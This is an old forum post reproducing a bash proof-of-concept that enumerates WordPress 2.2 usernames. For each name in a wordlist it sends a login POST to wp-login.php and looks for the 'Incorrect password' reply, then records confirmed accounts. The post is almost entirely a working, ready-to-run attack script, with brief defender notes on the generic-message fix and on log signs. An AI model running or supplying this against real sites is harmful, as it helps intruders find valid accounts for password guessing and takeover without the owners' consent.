
05.10.2007, 19:54
Wordpress 2.2 Username Enumeration
PHP код:
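#!/bin/bash
# Proof-of-concept check for the low-risk username enumeration weakness on the
# Wordpress 2.2 login page. Previous versions are possibly affected as well.
#
# How the check works: for every candidate name in the wordlist the script
# POSTs one login attempt with a fixed dummy password to
# /wordpress/wp-login.php and searches the reply for the text
# 'Incorrect password'. The script treats that text as the sign that the
# account exists, i.e. it relies on the login page answering a known user
# name differently from an unknown one.
#
# Defender notes:
#   - The fix on the application side is a single generic failure message
#     for both cases, plus throttling or lockout of repeated failed logins.
#   - In web-server logs a run appears as a rapid series of POST requests to
#     wp-login.php from one client, none followed by a successful login.
#
# Note: you need curl [http://curl.haxx.se/download.html]
# installed on your system for this script to work.
#
# Usage:   $0 <ip-or-hostname> <wordlist-filename>
# Output:  confirmed names on stdout, and appended to "$0.found".
# Returns: 1 on wrong argument count or unreadable wordlist.
#
# Adrian Pastor - http://www.gnucitizen.org/

if [ "$#" -ne 2 ]; then
  echo "need two parameters! correct syntax is:" >&2
  echo "$0 <ip-or-hostname> <wordlist-filename>" >&2
  exit 1
fi

# Fail early with a clear message instead of looping over nothing.
if [ ! -r "$2" ]; then
  echo "cannot read wordlist: $2" >&2
  exit 1
fi

# One candidate per line; `read -r` keeps backslashes literal and the
# `|| [ -n "$U" ]` clause picks up a last line without a trailing newline.
while IFS= read -r U || [ -n "$U" ]; do
  # Skip blank lines in the wordlist.
  [ -n "$U" ] || continue

  # The whole request must stay one command: the forum paste had wrapped it
  # over several lines, which left the redirection without a target.
  if curl -s -d "log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" \
      --url "http://$1/wordpress/wp-login.php" \
    | grep -qi 'Incorrect password'
  then
    # Print the confirmed name on screen.
    echo "username found!: $U"
    # Save it to a file named after the script plus a .found extension.
    printf '%s\n' "$U" >> "$0.found"
  fi
done < "$2"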